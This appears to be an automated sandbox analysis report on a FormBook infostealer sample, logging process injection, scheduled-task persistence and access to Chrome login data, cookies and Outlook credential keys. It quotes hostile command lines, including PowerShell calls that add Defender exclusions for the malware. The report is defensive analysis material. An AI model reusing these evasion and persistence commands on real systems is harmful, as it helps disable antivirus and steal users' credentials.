Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtMapViewOfSection: Direct from: 0x774CFC72
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtCreateThreadEx: Direct from: 0x774D08C6
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtDeviceIoControlFile: Direct from: 0x774CF931
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtRequestWaitReplyPort: Direct from: 0x753C6BCE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryValueKey: Direct from: 0x774CFACA
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtOpenSection: Direct from: 0x774CFDEA
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtProtectVirtualMemory: Direct from: 0x774D005A
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtWriteVirtualMemory: Direct from: 0x774CFE36 Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtRequestWaitReplyPort: Direct from: 0x756F8D92 Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryVolumeInformationFile: Direct from: 0x774CFFAE
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtNotifyChangeKey: Direct from: 0x774D0F92
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQueryAttributesFile: Direct from: 0x774CFE7E
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtReadVirtualMemory: Direct from: 0x774CFEB2 Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetTimer: Direct from: 0x774E98D5
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtSetInformationFile: Direct from: 0x774CFC5A Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe NtQuerySystemInformation: Direct from: 0x774CFDD2
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\ekte.exe Memory written: C:\Users\user\Desktop\ekte.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory written: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe base: 400000 value starts with: 4D5A Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ekte.exe Section loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: NULL target: C:\Users\user\Desktop\ekte.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Section loaded: NULL target: C:\Windows\SysWOW64\findstr.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\findstr.exe Thread APC queued: target process: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ekte.exe" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp47BA.tmp" Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Process created: C:\Users\user\Desktop\ekte.exe "C:\Users\user\Desktop\ekte.exe" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eFDiSxeTfjUqTk" /XML "C:\Users\user\AppData\Local\Temp\tmp1A06.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Process created: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe "C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe" Jump to behavior
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe Process created: C:\Windows\SysWOW64\findstr.exe "C:\Windows\SysWOW64\findstr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: BuhvZTwGQCD.exe, 0000000F.00000000.392829754.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626635514.0000000000A80000.00000002.00000001.00040000.00000000.sdmp, BuhvZTwGQCD.exe, 00000014.00000002.626934428.0000000000BA0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\ekte.exe Queries volume information: C:\Users\user\Desktop\ekte.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Queries volume information: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\zjplj4.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E88B90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 19_2_61E88B90
Source: C:\Users\user\Desktop\ekte.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7 Jump to behavior
Source: C:\Windows\SysWOW64\findstr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E29157 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob, 19_2_61E29157
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E290EA sqlite3_bind_zeroblob,sqlite3_mutex_leave, 19_2_61E290EA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E290B9 sqlite3_bind_null,sqlite3_mutex_leave, 19_2_61E290B9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E29093 sqlite3_bind_int,sqlite3_bind_int64, 19_2_61E29093
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E29044 sqlite3_bind_int64,sqlite3_mutex_leave, 19_2_61E29044
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E2923E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave, 19_2_61E2923E
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E03568 sqlite3_bind_parameter_name, 19_2_61E03568
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E03556 sqlite3_bind_parameter_count, 19_2_61E03556
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E13A33 sqlite3_bind_parameter_index, 19_2_61E13A33
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E16CEE sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave, 19_2_61E16CEE
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28FDF sqlite3_bind_double,sqlite3_mutex_leave, 19_2_61E28FDF
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28FB8 sqlite3_bind_text16, 19_2_61E28FB8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28F4B sqlite3_bind_text64, 19_2_61E28F4B
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28F24 sqlite3_bind_text, 19_2_61E28F24
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28EDD sqlite3_bind_blob64, 19_2_61E28EDD
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E28EB6 sqlite3_mutex_leave,sqlite3_bind_blob, 19_2_61E28EB6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E16EBE sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings, 19_2_61E16EBE
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
